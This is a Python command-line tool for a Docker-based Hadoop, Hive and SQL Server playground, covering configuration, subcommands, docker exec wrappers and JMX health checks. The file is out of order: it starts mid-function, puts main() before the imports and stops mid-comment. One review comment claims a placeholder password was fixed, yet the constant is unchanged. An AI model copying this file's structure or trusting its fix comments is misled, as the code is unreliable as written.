    Prompts for interactive user input using a validator function.

    Keeps re-prompting until validator_func accepts the input.
    """
    while True:
        answer = input(prompt)
        if validator_func(answer):
            return answer
        print(failure_msg)
def validate_project_name(val):
    """
    Input validator function for project name configuration.
    """
    # Reject any non-word character, then require strictly alphanumeric
    # (which also rejects underscores and the empty string).
    has_non_word = re.search(r'\W', val) is not None
    return (not has_non_word) and val.isalnum()
def validate_directory(val):
    """
    Input validator function for a directory name.
    """
    # Accepts any path that currently exists on disk (file or directory).
    return os.path.exists(val)
def validate_parent_directory(val):
    """
    Input validator function for a directory name where only the parent directory needs to exist.
    """
    parent = os.path.dirname(val)
    return os.path.exists(parent)
def validate_yn(val):
    """
    Input validator function for yes/no prompts.
    """
    return val.lower() in ('y', 'n')
def set_environment(config):
    """
    Sets the environment variables for consumption by docker-compose.
    """
    os.environ['project_name'] = config.project_name
    os.environ['source_dir'] = config.source_dir
    os.environ['data_dir'] = config.data_dir
    os.environ['volumes_dir'] = config.volumes_dir
    # Bug fix: '<PASSWORD>' was an unresolved bare placeholder (a syntax
    # error); the intended value is the module's test password constant.
    os.environ['sql_test_password'] = SQL_TEST_PASSWORD
def configure(args):
    """
    Returns config using a file, arguments, or interactive input.
    """
    _f = args.config_file
    config = None
    if get_config_file_needed(args):
        # Not every config variable was supplied on the command line, so a
        # config file (created interactively if missing) fills in the rest.
        if not os.path.exists(_f):
            _o = input_with_validator('Config file "%s" does not exist. Would you like to create one' \
                ' interactively? (y/n): ' % _f, 'Please input "y" or "n".', validate_yn)
            if _o.lower() == 'y':
                config = configure_interactively()
                config.save(_f)
                print('Config saved.')
            else:
                print('Program needs configuration. Exiting.')
                sys.exit(1)
                # Unreachable after sys.exit(1); kept as a defensive guard.
                return
        else:
            config = Config.load(_f)
            print('Config read.')
        # Command-line overrides take precedence over values from the file.
        if args.project_name:
            config.project_name = args.project_name
        if args.source_dir:
            config.source_dir = args.source_dir
        if args.data_dir:
            config.data_dir = args.data_dir
        if args.volumes_dir:
            config.volumes_dir = args.volumes_dir
    else:
        # All four variables came from the CLI; no config file is needed.
        config = Config(args.project_name, args.source_dir, args.data_dir, args.volumes_dir)
    return config
def configure_interactively():
    """
    Creates a config from interactive input.
    """
    # (prompt, failure message, validator) per Config constructor argument,
    # in positional order.
    prompts = [
        ('Please input your project name: ',
         'No spaces or non-alphanumeric characters allowed.', validate_project_name),
        ('Please input your playground src directory: ',
         'Please use a valid directory name that exists.', validate_directory),
        ('Please input your data directory: ',
         'Please use a valid directory name that exists.', validate_directory),
        ('Please input your volumes directory: ',
         'Please use a valid parent directory name that exists.', validate_parent_directory)
    ]
    values = [input_with_validator(p, f, v) for p, f, v in prompts]
    return Config(*values)
# CLI adapter functions: argparse dispatch targets wired up in main().
# They all share the (config, args) signature even when args is unused.
def build_img_cmd(config, args):
    """
    Command line function. See build_img() for documentation.
    """
    build_img(config)
def format_hdfs_cmd(config, args):
    """
    Command line function. See format_hdfs() for documentation.
    """
    format_hdfs(config)
def ingest_data_cmd(config, args):
    """
    Command line function. See ingest_data() for documentation.
    """
    ingest_data(config)
def copy_source_cmd(config, args):
    """
    Command line function. See copy_source() for documentation.
    """
    copy_source(config)
def setup_hive_cmd(config, args):
    """
    Command line function. See setup_hive() for documentation.
    """
    setup_hive(config)
def cluster_up_cmd(config, args):
    """
    Command line function. See cluster_up() for documentation.
    """
    cluster_up(config)
def start_hadoop_daemons_cmd(config, args):
    """
    Command line function. See start_hadoop_daemons() for documentation.
    """
    start_hadoop_daemons(config)
def start_hive_server_cmd(config, args):
    """
    Command line function. See start_hive_server() for documentation.
    """
    start_hive_server(config)
def cluster_down_cmd(config, args):
    """
    Command line function. See cluster_down() for documentation.
    """
    cluster_down(config)
def setup_cmd(config, args):
    """
    Command line function. See setup() for documentation.
    """
    # Guard clause: unless -y was given, confirm the destructive delete first.
    if not args.skip_confirm:
        answer = input_with_validator('Are you sure you want to delete directory "%s" and all of its' \
            ' files? y/n: ' % (config.volumes_dir), \
            'Please use "y" or "n".', \
            validate_yn \
            ).lower()
        if answer != 'y':
            print('Cancelling.')
            return
    setup(config)
def start_cmd(config, args):
    """
    Command line function. See start() for documentation.
    """
    # --no-wait inverts into the positive `wait` flag that start() expects.
    start(config, wait=not args.no_wait)
def stop_cmd(config, args):
    """
    Command line function. See stop() for documentation.
    """
    stop(config)
def destroy_volumes_cmd(config, args):
    """
    Command line function. See destroy_volumes() for documentation.
    """
    # Guard clause: unless -y was given, confirm the destructive delete first.
    if not args.skip_confirm:
        answer = input_with_validator('Are you sure you want to delete directory "%s" and all of its' \
            ' files? y/n: ' % (config.volumes_dir), \
            'Please use "y" or "n".', \
            validate_yn \
            ).lower()
        if answer != 'y':
            print('Cancelling.')
            return
    destroy_volumes(config)
# CLI adapter functions: argparse dispatch targets that forward parsed
# arguments to the corresponding implementation function.
def print_hadoop_node_logs_cmd(config, args):
    """
    Command line function. See print_hadoop_node_logs() for documentation.
    """
    print_hadoop_node_logs(config, args.node)
def beeline_cli_cmd(config, args):
    """
    Command line function. See beeline_cli() for documentation.
    """
    beeline_cli(config)
def bash_cli_cmd(config, args):
    """
    Command line function. See bash_cli() for documentation.
    """
    bash_cli(config, args.node)
def sqlcmd_cli_cmd(config, args):
    """
    Command line function. See sqlcmd_cli() for documentation.
    """
    sqlcmd_cli(config, args.local)
def sql_exec_query_cmd(config, args):
    """
    Command line function. See sql_exec_query() for documentation.
    """
    sql_exec_query(config, args.query, args.database)
def sql_exec_file_cmd(config, args):
    """
    Command line function. See sql_exec_file() for documentation.
    """
    sql_exec_file(config, args.filename)
def sqoop_export_cmd(config, args):
    """
    Command line function. See sqoop_export() for documentation.
    """
    sqoop_export(config, args.export_dir, args.sql_table, args.database_name, args.delimiter)
def local_sql_info_cmd(config, args):
    """
    Command line function. Prints out non-secured sql server connection info.
    """
    print('SERVER NAME: tcp:localhost,%d' % (PORT_SQL_SQL))
    # Typo fix: previously printed 'SQL Server AUthentication'.
    print('AUTHENTICATION: SQL Server Authentication')
    print('LOGIN: sa')
    print('PASSWORD: %s' % (SQL_TEST_PASSWORD))
# CLI adapter functions: argparse dispatch targets that forward parsed
# arguments to the corresponding implementation function.
def launch_ssms_win_local_cmd(config, args):
    """
    Command line function. See launch_ssms_win_local() for documentation.
    """
    launch_ssms_win_local(args.executable_path)
def exec_hive_file_cmd(config, args):
    """
    Command line function. See exec_hive_file() for documentation.
    """
    exec_hive_file(config, args.src_path)
def exec_hive_query_cmd(config, args):
    """
    Command line function. See exec_hive_query() for documentation.
    """
    exec_hive_query(config, args.query)
def print_health_cmd(config, args):
    """
    Command line function. See print_health() for documentation.
    """
    print_health(config)
def wait_for_healthy_nodes_cmd(config, args):
    """
    Command line function. See wait_for_healthy_nodes_print() for documentation.
    """
    wait_for_healthy_nodes_print(config, args.timeout)
def get_config_file_needed(args):
    """
    Determines whether or not we need to fetch additional config variables from a file.
    """
    # A config file is only unnecessary when every variable was given on the CLI.
    overrides = (args.project_name, args.source_dir, args.data_dir, args.volumes_dir)
    return not all(overrides)
def main():
    """
    Main entry point for the program.

    Builds the argparse CLI, resolves configuration, and dispatches to the
    subcommand's handler function.
    """
    parser = argparse.ArgumentParser(prog='playground', description='HDFS, Hive, and SQL Playground')
    parser.set_defaults(func=None)
    # config-file
    parser.add_argument('--config-file', '-c', default='config.json', help='The filename' \
        ' of the configuration file.')
    # config-overrides
    config_group = parser.add_argument_group('config-overrides', description='Overrides' \
        ' the configuration variables.')
    config_group.add_argument('--project-name', '-p')
    config_group.add_argument('--source-dir', '-s')
    config_group.add_argument('--data-dir', '-d')
    config_group.add_argument('--volumes-dir', '-v')
    config_group.set_defaults(project_name=None, source_dir=None, data_dir=None, volumes_dir=None)
    subparsers = parser.add_subparsers()
    # build-img
    subparsers.add_parser('build-img', help='Builds or rebuilds the required Docker images. Do this' \
        ' when you change the Dockerfile or anything in ./bin/.').set_defaults(func=build_img_cmd)
    # format-hdfs
    subparsers.add_parser('format-hdfs', help='Formats the entire distributed file system of the' \
        ' running cluster.').set_defaults(func=format_hdfs_cmd)
    # ingest-data
    subparsers.add_parser('ingest-data', help='Copies the mounted data volume to HDFS at /data on' \
        ' the running cluster.').set_defaults(func=ingest_data_cmd)
    # copy-source
    subparsers.add_parser('copy-source', help='Copies the configured source folder to the mounted' \
        ' client node volume.').set_defaults(func=copy_source_cmd)
    # setup-hive
    subparsers.add_parser('setup-hive', help='Creates the Hive schema metastore and makes' \
        ' necessary directories in HDFS. Cluster should be up and hadoop daemons should already' \
        ' be running.').set_defaults(func=setup_hive_cmd)
    # cluster-up
    subparsers.add_parser('cluster-up', help='Boots up all the nodes on the cluster but does not' \
        ' start any of their services.').set_defaults(func=cluster_up_cmd)
    # start-hadoop
    subparsers.add_parser('start-hadoop', help='Starts the name node and data node services for' \
        ' HDFS on a running cluster.').set_defaults(func=start_hadoop_daemons_cmd)
    # start-hive
    subparsers.add_parser('start-hive', help='Starts the hive server in the running cluster.') \
        .set_defaults(func=start_hive_server_cmd)
    # cluster-down
    subparsers.add_parser('cluster-down', help='Shuts down all of the nodes.') \
        .set_defaults(func=cluster_down_cmd)
    # setup
    setup_p = subparsers.add_parser('setup', help='Sets up the cluster for the first time.')
    setup_p.add_argument('--skip-confirm', '-y', action='store_true', help='Skips any confirmation' \
        ' messages')
    setup_p.set_defaults(func=setup_cmd, skip_confirm=False)
    # start
    start_p = subparsers.add_parser('start', help='Spins up the cluster and starts the daemons on ' \
        'each node.')
    start_p.add_argument('--no-wait', '-w', action='store_true', help='Exits immediately after ' \
        'the cluster daemons have been told to start rather than blocking until the nodes are healthy.')
    start_p.set_defaults(func=start_cmd, no_wait=False)
    # stop
    subparsers.add_parser('stop', help='Stops all of the services and shuts down all of the nodes.') \
        .set_defaults(func=stop_cmd)
    # destroy-vol
    destroy_vol_p = subparsers.add_parser('destroy-vol', help='Removes all persisted cluster files.')
    destroy_vol_p.add_argument('--skip-confirm', '-y', action='store_true')
    destroy_vol_p.set_defaults(func=destroy_volumes_cmd, skip_confirm=False)
    # print-hadoop-logs
    print_hadoop_node_logs_p = subparsers.add_parser('print-hadoop-logs', help='Prints the log file' \
        ' of the specified hadoop node.')
    print_hadoop_node_logs_p.add_argument('--node', '-n', help='The node to check the logs for.')
    print_hadoop_node_logs_p.set_defaults(func=print_hadoop_node_logs_cmd)
    # beeline-cli
    subparsers.add_parser('beeline-cli', help='Launches a cli using beeline on the client node.') \
        .set_defaults(func=beeline_cli_cmd)
    # bash-cli
    bash_cli_p = subparsers.add_parser('bash-cli', help='Launches bash cli on a single node in the' \
        ' cluster.')
    bash_cli_p.add_argument('--node', '-n', help='The Docker service name of the node. Refer to the' \
        ' docker-compose.yml. Examples: "client", "nn1", "dn1", etc.')
    bash_cli_p.set_defaults(func=bash_cli_cmd, node='client')
    # sql-cli
    sql_cli_p = subparsers.add_parser('sql-cli', help='Launches sqlcmd on the client' \
        ' node or locally.')
    sql_cli_p.add_argument('--local', '-l', action='store_true', help='If specified, sqlcmd is' \
        ' launched on the host machine instead of the client node. Note: this requires sqlcmd to' \
        ' be on the environment PATH variable.')
    sql_cli_p.set_defaults(func=sqlcmd_cli_cmd, local=False)
    # sql-exec-query
    sql_exec_query_p = subparsers.add_parser('sql-exec-query', help='Executes an SQL query.')
    sql_exec_query_p.add_argument('--query', '-q', help='The sql query.')
    sql_exec_query_p.add_argument('--database', '-d', help='The database to use.')
    sql_exec_query_p.set_defaults(func=sql_exec_query_cmd, database='master')
    # sql-exec-file
    sql_exec_file_p = subparsers.add_parser('sql-exec-file', help='Executes an SQL file on the ' \
        'client node.')
    sql_exec_file_p.add_argument('--filename', '-f', help='The relative filename in the source dir.')
    sql_exec_file_p.set_defaults(func=sql_exec_file_cmd)
    # sqoop-export
    sqoop_export_p = subparsers.add_parser('sqoop-export', help='Exports CSV files loaded in HDFS' \
        ' to the sql server node.')
    sqoop_export_p.add_argument('--export-dir', '-e', help='The directory in HDFS which contains' \
        ' the CSV files.')
    sqoop_export_p.add_argument('--sql-table', '-t', help='The name of the sql table to export to.' \
        ' Note: this table should already exist with the correct schema.')
    sqoop_export_p.add_argument('--database-name', '-b', help='The name of the database to' \
        ' export to.')
    sqoop_export_p.add_argument('--delimiter', '-d', help='The character used to for delimiting' \
        ' the values in the HDFS files.')
    sqoop_export_p.set_defaults(func=sqoop_export_cmd, database_name='master', delimiter=',')
    # local-sql-info
    subparsers.add_parser('local-sql-info', help='Shows the connection information for connecting' \
        ' to the sql server from the parent host.').set_defaults(func=local_sql_info_cmd)
    # launch-ssms
    launch_ssms_p = subparsers.add_parser('launch-ssms', help='Note: Only works on Windows and' \
        ' requires installation of SQL Server Management Server. This command launches SQL Server' \
        ' Management Server using the local connection information.')
    launch_ssms_p.add_argument('--executable-path', '-f')
    launch_ssms_p.set_defaults(func=launch_ssms_win_local_cmd, executable_path= \
        'C:\\Program Files (x86)\\Microsoft SQL Server Management Studio 18\\Common7\\IDE\\Ssms.exe')
    # exec-hive-file
    exec_hive_file_p = subparsers.add_parser('exec-hive-file', help='Executes a hive script from' \
        ' the src folder.')
    exec_hive_file_p.add_argument('--src-path', '-f', help='The relative path to the file on the ' \
        'linux node')
    exec_hive_file_p.set_defaults(func=exec_hive_file_cmd)
    # exec-hive-query
    exec_hive_query_p = subparsers.add_parser('exec-hive-query', help='Executes a single' \
        ' hive query.')
    exec_hive_query_p.add_argument('--query', '-e', help='The hive query string to execute.')
    exec_hive_query_p.set_defaults(func=exec_hive_query_cmd)
    # print-health
    subparsers.add_parser('print-health', help='Prints the cluster health information.') \
        .set_defaults(func=print_health_cmd)
    # wait-for-healthy-nodes
    wait_p = subparsers.add_parser('wait-for-healthy-nodes', help='Waits until the cluster is ' \
        'healthy or until timeout.')
    # Bug fix: without type=int a CLI-supplied timeout arrives as a string and
    # wait_for_healthy_nodes() crashes on `timeout / interval`.
    wait_p.add_argument('--timeout', '-t', type=int, help='The time in seconds until command timeout.')
    wait_p.set_defaults(func=wait_for_healthy_nodes_cmd, timeout=200)
    args = parser.parse_args()
    if not args.func:
        # No subcommand given: show usage instead of failing later.
        print('No subcommand selected. Use -h to get help.')
        parser.print_usage()
        return
    config = configure(args)
    args.func(config, args)
    print('Program end.')
if __name__ == '__main__':
    main()
import argparse
import collections
import distutils.dir_util
import json
import os
import re
import shutil
import subprocess
import sys
import time
# PyPI installed modules...
import requests
# The root directory of the playground repository
ROOT_DIR = os.path.dirname(os.path.realpath(__file__))
# The hadoop distribution path on the docker nodes
HADOOP_HOME = '/himage/hadoop-3.3.0'
# The hive distribution path on the docker nodes
HIVE_HOME = '/himage/apache-hive-3.1.2-bin'
# The sqoop distribution path on the docker nodes
SQOOP_HOME = '/himage/sqoop-1.4.7.bin__hadoop-2.6.0'
# The path of the docker-compose.yml file
COMPOSE_FILE = os.path.join(ROOT_DIR, 'docker-compose.yml')
# The non-secured sql password used on the sql node
# NOTE(review): '<PASSWORD>' looks like a redacted placeholder rather than a
# usable value -- confirm and substitute a real test password before running.
SQL_TEST_PASSWORD = '<PASSWORD>'
# The number of data nodes in the cluster (this variable only affects health checks)
NUM_DATA_NODES = 1
# The number of node manager nodes in the cluster (this variable only affects health checks)
NUM_NODE_MANAGERS = 1
# The minimum amount of disk space each node requires to operate (applicable in health checks)
MIN_DISK_SPACE = 8589934592 # 8 GiB (2**33 bytes; the previous '1GB' note did not match the value)
# Exposed localhost ports for each of the nodes
PORT_UI_NN1 = 3000
PORT_UI_DN1 = 3001
PORT_UI_RMAN = 3002
PORT_UI_NM1 = 3003
PORT_UI_MRHIST = 3004
PORT_UI_HS = 3005
PORT_SQL_SQL = 3006
# Descriptions of what each port does: (port, protocol, description)
PORT_DOC = [
    (PORT_UI_NN1, 'http', 'Web UI for the primary name node'),
    (PORT_UI_DN1, 'http', 'Web UI for data node 1'),
    (PORT_UI_RMAN, 'http', 'Web UI for YARN resource manager'),
    (PORT_UI_NM1, 'http', 'Web UI for node manager 1'),
    (PORT_UI_MRHIST, 'http', 'Web UI map reduce history server'),
    (PORT_UI_HS, 'http', 'Web UI for hive server'),
    (PORT_SQL_SQL, 'sql (tcp/ip)', 'SQL server connection port')
]
# A health checklist item description
NodeHealthBeanCheck = collections.namedtuple('NodeHealthBeanCheck', \
    'bean_name prop_name check_func')
# The status of a single node in the cluster
NodeHealthReport = collections.namedtuple('NodeHealthReport', \
    'is_healthy message')
# A summary of the status on each of the nodes in the cluster
HealthReportSummary = collections.namedtuple('HealthReportSummary', \
    'cluster_healthy nn1 dn1 rman nm1 mrhist hs client sql')
class Config:
    """
    Represents the configuration for any playground tasks
    """
    def __init__(self, project_name=None, source_dir=None, data_dir=None, volumes_dir=None):
        # All assignments go through the property setters below, which
        # normalize directory paths to absolute form.
        self.project_name = project_name
        self.source_dir = source_dir
        self.data_dir = data_dir
        self.volumes_dir = volumes_dir
    @property
    def project_name(self):
        """
        The project name used for the Docker-Compose project name
        """
        return self._project_name
    @project_name.setter
    def project_name(self, value):
        self._project_name = value
    @property
    def source_dir(self):
        """
        The local directory containing files to be uploaded to the client node /src directory upon
        setup.
        """
        return self._source_dir
    @source_dir.setter
    def source_dir(self, value):
        # Stored as an absolute path; falsy values (unset) become None.
        if value:
            self._source_dir = os.path.abspath(value)
        else:
            self._source_dir = None
    @property
    def data_dir(self):
        """
        The local directory containing files to be ingested into HDFS upon setup.
        """
        return self._data_dir
    @data_dir.setter
    def data_dir(self, value):
        # Stored as an absolute path; falsy values (unset) become None.
        if value:
            self._data_dir = os.path.abspath(value)
        else:
            self._data_dir = None
    @property
    def volumes_dir(self):
        """
        The local directory (which may not yet exist) where docker will persist files between runs.
        """
        return self._volumes_dir
    @volumes_dir.setter
    def volumes_dir(self, value):
        # Stored as an absolute path; falsy values (unset) become None.
        if value:
            self._volumes_dir = os.path.abspath(value)
        else:
            self._volumes_dir = None
    def save(self, filename):
        """
        Saves the configuration to a file.
        """
        with open(filename, 'w') as _fp:
            json.dump({ \
                'project_name': self._project_name, \
                'source_dir': self._source_dir, \
                'data_dir': self._data_dir, \
                'volumes_dir': self._volumes_dir \
            }, _fp, indent=2)
    @staticmethod
    def load(filename):
        """
        Loads the configuration from a file.
        """
        # Raises KeyError when a required key is missing from the file.
        with open(filename, 'r') as _fp:
            _c = Config()
            _j = json.load(_fp)
            _c.project_name = _j['project_name']
            _c.source_dir = _j['source_dir']
            _c.data_dir = _j['data_dir']
            _c.volumes_dir = _j['volumes_dir']
            return _c
def exec_docker(config, node_name, command, workdir=None,
                interactive=False, detached=False, check=True):
    """
    Executes a command on a node through docker.

    :param config: playground Config supplying the compose project name.
    :param node_name: docker-compose service name (container is <project>_<name>_1).
    :param command: command string; whitespace-split except for double-quoted
        segments, which are kept as single arguments.
    :param workdir: optional working directory inside the container.
    :param interactive: attach an interactive tty (-i -t).
    :param detached: run the command detached (-d).
    :param check: raise CalledProcessError on non-zero exit when True.
    :returns: the process return code.
    """
    _args = ['docker', 'exec']
    if workdir:
        _args.extend(['-w', workdir])
    if interactive:
        _args.extend(['-i', '-t'])
    if detached:
        _args.append('-d')
    _args.append('%s_%s_1' % (config.project_name, node_name))
    # Tokenize: split on spaces outside double quotes, keep quoted runs whole.
    split_spaces = True
    for _c in command.split('"'):
        if split_spaces:
            _args.extend(_s for _s in _c.split(' ') if _s)
        else:
            _args.append(_c)
        split_spaces = not split_spaces
    # BUG FIX: the original passed shell=True with a list argument; on POSIX
    # that executes only the first list element ('docker') with the rest as
    # shell positional parameters. The argv is already fully built, so run it
    # directly without a shell.
    output = subprocess.run(_args, check=check)
    return output.returncode
def build_img(config):
    """
    Builds or rebuilds the dockerfile images.
    """
    # Export config to env vars first so docker-compose can interpolate them.
    set_environment(config)
    os.system('docker-compose -p %s -f "%s" build' % (config.project_name, COMPOSE_FILE))


def format_hdfs(config):
    """
    Formats hdfs in the cluster.
    """
    # 'clust' is the cluster id handed to the namenode format command.
    exec_docker(config, 'nn1', '%s/bin/hdfs namenode -format -force clust' % (HADOOP_HOME))


def ingest_data(config):
    """
    Ingests data from the configured data volume into hdfs.
    """
    # The /data mount on nn1 is copied into HDFS under the same path.
    exec_docker(config, 'nn1', '%s/bin/hadoop fs -put /data /data' % (HADOOP_HOME))


def copy_source(config):
    """
    Copies from the configured local source directory to the source volume.
    Use to update the client node's /src folder on a running cluster when new code is written.
    """
    if not os.path.exists(config.source_dir):
        print('Source directory does not exist. Please check configuration and try again.')
        return
    dir_name = os.path.join(config.volumes_dir, 'client')
    if not os.path.exists(dir_name):
        os.makedirs(dir_name)
    # NOTE(review): distutils is deprecated and removed in Python 3.12;
    # shutil.copytree(src, dst, dirs_exist_ok=True) is the modern merge-copy
    # equivalent — confirm the supported Python version before switching.
    distutils.dir_util.copy_tree(config.source_dir, dir_name)
    print('Source files copied to volume.')


def setup_hive(config):
    """
    Makes required hdfs directories for hive to run and initializes the schema metastore.
    """
    fs_cmd = '%s/bin/hadoop fs ' % (HADOOP_HOME)
    # check=False: the directories may already exist on a re-run; not fatal.
    exec_docker(config, 'nn1', fs_cmd + '-mkdir /tmp', check=False)
    exec_docker(config, 'nn1', fs_cmd + '-mkdir -p /user/hive/warehouse', check=False)
    exec_docker(config, 'nn1', fs_cmd + '-chmod g+w /tmp')
    exec_docker(config, 'nn1', fs_cmd + '-chmod g+w /user/hive/warehouse')
    exec_docker(config, 'hs', '%s/bin/schematool -dbType derby -initSchema' % \
        (HIVE_HOME), workdir='/metastore')


def cluster_up(config):
    """
    Boots the cluster up but does not run any of the daemons.
    """
    set_environment(config)
    os.system('docker-compose -p %s -f "%s" up -d' % (config.project_name, COMPOSE_FILE))


def start_hadoop_daemons(config):
    """
    Runs all daemons in the hadoop distribution on their respective nodes.
    """
    exec_docker(config, 'nn1', '%s/bin/hdfs --daemon start namenode' % (HADOOP_HOME))
    exec_docker(config, 'dn1', '%s/bin/hdfs --daemon start datanode' % (HADOOP_HOME))
    exec_docker(config, 'rman', '%s/bin/yarn --daemon start resourcemanager' % (HADOOP_HOME))
    exec_docker(config, 'nm1', '%s/bin/yarn --daemon start nodemanager' % (HADOOP_HOME))
    exec_docker(config, 'mrhist', '%s/bin/mapred --daemon start historyserver' % (HADOOP_HOME))


def start_hive_server(config):
    """
    Starts the hive server daemon.
    """
    # Detached: hiveserver2 runs in the foreground, so leave it running in the container.
    exec_docker(config, 'hs', '%s/bin/hiveserver2' % (HIVE_HOME), \
        detached=True, workdir='/metastore')


def cluster_down(config):
    """
    Spins the cluster down.
    """
    set_environment(config)
    os.system('docker-compose -p %s -f "%s" down' % (config.project_name, COMPOSE_FILE))
def metric_request(port):
    """
    Sends an http request to a node's jmx endpoint.

    :param port: localhost port exposing the node's web UI.
    :returns: the parsed json dict, or None on any connection/HTTP/parse error.
    """
    try:
        _r = requests.get('http://localhost:%d/jmx' % (port))
    # BUG FIX: was a bare `except:`, which also swallows KeyboardInterrupt and
    # SystemExit. Catch only request-level failures (connection refused,
    # timeouts, etc.).
    except requests.exceptions.RequestException:
        return None
    if _r.status_code != 200:
        return None
    try:
        return _r.json()
    except ValueError:
        # Body was not valid JSON.
        return None
def find_bean_by_name(jsn, nme):
    """
    Extracts a bean of the given name from jmx metrics json object.

    :param jsn: parsed jmx metrics json (expected to carry a 'beans' list).
    :param nme: the bean name to search for.
    :returns: the first matching bean dict, or None when 'beans' is absent
        or no bean matches.
    """
    if 'beans' not in jsn:
        return None
    # Robustness fix: use .get() so beans without a 'name' key are skipped
    # instead of raising KeyError.
    return next((b for b in jsn['beans'] if b.get('name') == nme), None)
def extract_bean_prop(jsn, bean_name, propname):
    """
    Extracts a property of a bean of the given name from jmx metrics json object.

    :returns: the property value, or None when the bean is missing or lacks
        the property.
    """
    bean = find_bean_by_name(jsn, bean_name)
    if not bean or propname not in bean:
        return None
    return bean[propname]
def gen_node_report_from_checks(jsn, checks):
    """
    Creates a node health report using the jmx metrics json and a list of type NodeHealthBeanCheck.

    Every check contributes one checklist line prefixed with a check mark or
    a cross; any failed or missing check marks the whole node unhealthy.
    """
    healthy = True
    messages = []
    for check in checks:
        value = extract_bean_prop(jsn, check.bean_name, check.prop_name)
        if value is None:
            healthy = False
            messages.append('\u274C Missing required bean property. Bean name: "%s", property: "%s"' % \
                (check.bean_name, check.prop_name))
            continue
        report = check.check_func(value)
        if report.is_healthy:
            messages.append('\u2705 ' + report.message)
        else:
            healthy = False
            messages.append('\u274C ' + report.message)
    return NodeHealthReport(is_healthy=healthy, message='\n'.join(messages))
def _check_func_disk_space(prop_val):
    """
    A check function for comparing the prop_val to the expected disk space amount.

    :param prop_val: remaining bytes reported by the node.
    """
    if prop_val >= MIN_DISK_SPACE:
        return NodeHealthReport(is_healthy=True, message='Sufficient disk space.')
    return NodeHealthReport(
        is_healthy=False,
        message='Insufficient disk space. Minimum required disk space is %d.'
                ' Remaining bytes: %d' % (MIN_DISK_SPACE, prop_val))
def json_checker_namenode(jsn):
    """
    Checks the jmx metrics json for the namenode and returns a node health report.
    """
    checks = [
        # Startup must have fully completed.
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=NameNode,name=StartupProgress',
            prop_name='PercentComplete',
            check_func=lambda i: (
                NodeHealthReport(is_healthy=True, message='Startup completed.')
                if i == 1.0 else
                NodeHealthReport(
                    is_healthy=False,
                    message='Startup not complete. Progress: %%%f.' % (i * 100)))),
        # The namenode must be in the 'active' HA state.
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=NameNode,name=FSNamesystem',
            prop_name='tag.HAState',
            check_func=lambda i: (
                NodeHealthReport(is_healthy=True, message='Namenode active.')
                if i == 'active' else
                NodeHealthReport(
                    is_healthy=False,
                    message='Namenode inactive. State: "%s"' % (i)))),
        # Missing blocks mean data loss.
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=NameNode,name=FSNamesystem',
            prop_name='MissingBlocks',
            check_func=lambda i: (
                NodeHealthReport(is_healthy=True, message='No missing blocks.')
                if i == 0 else
                NodeHealthReport(
                    is_healthy=False,
                    message='One or more missing blocks. Data is missing.'
                            ' Blocks missing: %d.' % (i)))),
        # The namenode partition must have enough free space.
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=NameNode,name=FSNamesystem',
            prop_name='CapacityRemaining',
            check_func=_check_func_disk_space),
        # Every data node should be registered and live.
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=NameNode,name=FSNamesystemState',
            prop_name='NumLiveDataNodes',
            check_func=lambda i: (
                NodeHealthReport(is_healthy=True, message='All data nodes are connected.')
                if i == 1 else
                NodeHealthReport(
                    is_healthy=False,
                    message='Some data nodes are not connected.'
                            ' Number of connected data nodes: %d/%d' % (i, NUM_DATA_NODES)))),
        # No data node should have gone quiet.
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=NameNode,name=FSNamesystemState',
            prop_name='NumStaleDataNodes',
            check_func=lambda i: (
                NodeHealthReport(is_healthy=True, message='No stale data nodes.')
                if i == 0 else
                NodeHealthReport(
                    is_healthy=False,
                    message='Some data nodes have not sent a heartbeat in some time.'
                            ' Number of stale data nodes: %d' % (i)))),
    ]
    return gen_node_report_from_checks(jsn, checks)
def json_checker_datanode(jsn):
    """
    Checks the jmx metrics json for the datanode and returns a node health report.
    """
    checks = [
        # The data partition must have enough free space.
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=DataNode,name=FSDatasetState',
            prop_name='Remaining',
            check_func=_check_func_disk_space),
        # Any failed storage volume is a hard failure.
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=DataNode,name=FSDatasetState',
            prop_name='NumFailedVolumes',
            check_func=lambda i: (
                NodeHealthReport(is_healthy=True, message='No failed volumes.')
                if i == 0 else
                NodeHealthReport(
                    is_healthy=False,
                    message='One or more volumes have failed.'
                            ' Number of failed volumes: %d' % (i)))),
    ]
    return gen_node_report_from_checks(jsn, checks)
def json_checker_resourcemanager(jsn):
    """
    Checks the jmx metrics json for the resource manager node and returns a node health report.
    """
    checks = [
        # Every node manager should be registered with the resource manager.
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=ResourceManager,name=ClusterMetrics',
            prop_name='NumActiveNMs',
            check_func=lambda i: (
                NodeHealthReport(is_healthy=True, message='All node managers connected.')
                if i == 1 else
                NodeHealthReport(
                    is_healthy=False,
                    message='One or more node managers not connected.'
                            ' Number of connected node managers: %d/%d' % (i, NUM_NODE_MANAGERS)))),
        # No node manager should be reporting itself unhealthy.
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=ResourceManager,name=ClusterMetrics',
            prop_name='NumUnhealthyNMs',
            check_func=lambda i: (
                NodeHealthReport(is_healthy=True, message='All node managers are healthy.')
                if i == 0 else
                NodeHealthReport(
                    is_healthy=False,
                    message='One or more node managers are unhealthy.'
                            ' Number of unhealthy node managers: %d' % (i)))),
    ]
    return gen_node_report_from_checks(jsn, checks)
def json_checker_response_only(jsn):
    """
    Checks the jmx metrics json on any node that has jmx metrics but no other specific health checks.

    Healthy means a non-empty 'beans' list is present at all.
    """
    if 'beans' in jsn and len(jsn['beans']) > 0:
        return NodeHealthReport(is_healthy=True, message='\u2705 Response has expected json.')
    return NodeHealthReport(is_healthy=False,
                            message='\u274C Response does not have expected json.')
def gen_node_health_report(jsn, json_checker_func):
    """
    Generates a node health report using the json checker function.

    :param jsn: metrics json, or a falsy value when the fetch failed.
    :param json_checker_func: callable mapping the json to a report.
    """
    if not jsn:
        # No metrics at all: the request itself failed.
        return NodeHealthReport(
            is_healthy=False,
            message='\u274C Could not fetch metrics from server. Most likely the node is down.')
    return json_checker_func(jsn)
def gen_docker_health_report(config, node_name):
    """
    Generates a health report simply based on if the given node is running or not.

    :param node_name: docker-compose service name (e.g. 'client', 'sql').
    """
    # NOTE(review): after exec_docker's tokenizing this runs as
